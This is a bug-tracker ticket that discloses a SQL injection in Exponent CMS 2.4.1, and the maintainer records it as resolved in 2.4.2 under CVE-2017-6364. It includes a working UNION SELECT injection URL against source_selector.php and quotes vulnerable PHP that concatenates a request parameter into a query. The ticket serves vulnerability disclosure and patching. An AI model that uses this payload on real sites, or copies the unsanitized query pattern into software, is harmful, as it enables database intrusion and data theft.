#1407 SQL Injection Vulnerability in Exponent CMS 2.4.1 - Exponent CMS

Type	To find
responsible:me	tickets assigned to you
tagged:"@high"	tickets tagged @high
milestone:next	tickets in the upcoming milestone
state:invalid	tickets with the state invalid
created:"last week"	tickets created last week
sort:number, importance, updated	tickets sorted by #, importance or updated
Combine keywords for powerful searching.
Use advanced searching »

#1407 ✓resolved

SQL Injection Vulnerability in Exponent CMS 2.4.1

Reported by Croxy | February 26th, 2017 @ 03:56 PM | in 2.4.2 (closed)

http://xx.com/source_selector.php?controller=company&action=show
&id=1' UNION ALL SELECT 1,user(),1,1,1,1,1,1,1,1%23

In framework/modules/companyController.php

    function show()
    {
//        global $db, $user, $router;
        global $user, $router;
        //eDebug($this->params,true);
        expHistory::set('viewable', $this->params);

        $count_sql_start = 'SELECT COUNT(DISTINCT p.id) as c FROM '.DB_TABLE_PREFIX.'_product p ';

        $sql_start  = 'SELECT DISTINCT p.* FROM '.DB_TABLE_PREFIX.'_product p ';
        //$sql = 'JOIN '.DB_TABLE_PREFIX.'_product_storeCategories sc ON p.id = sc.product_id ';
        $sql = 'WHERE ';
        if (!$user->isAdmin()) $sql .= '(p.active_type=0 OR p.active_type=1) AND ' ;
        //$sql .= 'sc.storecategories_id IN (';
        //$sql .= 'SELECT id FROM '.DB_TABLE_PREFIX.'_storeCategories WHERE rgt BETWEEN '.$this->category->lft.' AND '.$this->category->rgt.')';
        $sql .=  'p.companies_id=' . $this->params['id'];
        $sql .=  ' AND p.parent_id = 0';

        $count_sql = $count_sql_start . $sql;
        $sql = $sql_start . $sql;
        //eDebug($sql);
        $order = 'id'; //$this->config['orderby'];
        $dir = 'DESC'; //$this->config['orderby_dir'];

I can control $this->params['id'],I can use this parameter for sql injection
IN

Line 118:

        assign_to_template(array(
            'record'=>new company($this->params['id']),
            'page'=>$page,
            'defaultSort'=>$defaultSort
        ));

Exponent3.png 70.3 KB

Comments and changes to this ticket

expNinja February 27th, 2017 @ 01:41 PM
- State changed from “new” to “resolved”
- Assigned user changed from “expNinja” to “dleffler”
- Milestone set to “2.4.2”
(from [85c1b9f3e0650e3b970dfd35584c419c06910594]) security fix exploits using source_selector.php reported by Belladona-c0re and croxy [#1407 state:resolved milestone:2.4.2 responsible:dleffler] https://github.com/exponentcms/exponent-cms/commit/85c1b9f3e0650e3b...
You flagged this item as spam.
Croxy March 2nd, 2017 @ 03:30 AM
Hi
I have successfully applied for a CVEID（CVE-2017-6364）.
Thank you

Please Sign in or create a free account to add a new ticket.

With your very own profile, you can contribute to projects, track your activity, watch tickets, receive and update tickets through your email and much more.

Create new ticket

Create your profile

Help contribute to this project by taking a few moments to create your personal profile. Create your profile »

Bug Tracker for Exponent CMS

Shared Ticket Bins (Sort)

↓↑ drag 337 Open tickets
↓↑ drag 775 Resolved tickets
↓↑ drag 0 This week's tickets

People watching this ticket

Attachments

Exponent3.png 70.3 KB

Exponentcms Exponent CMS → 2.4.2

SQL Injection Vulnerability in Exponent CMS 2.4.1

Comments and changes to this ticket

expNinja February 27th, 2017 @ 01:41 PM

Croxy March 2nd, 2017 @ 03:30 AM

Create your profile

Shared Ticket Bins (Sort)

People watching this ticket

Attachments

Pages

Exponentcms Exponent CMS → 2.4.2

Keyword searching

SQL Injection Vulnerability in Exponent CMS 2.4.1

Comments and changes to this ticket

expNinja February 27th, 2017 @ 01:41 PM

Croxy March 2nd, 2017 @ 03:30 AM

Create your profile

Shared Ticket Bins (Sort)

People watching this ticket

Attachments

Pages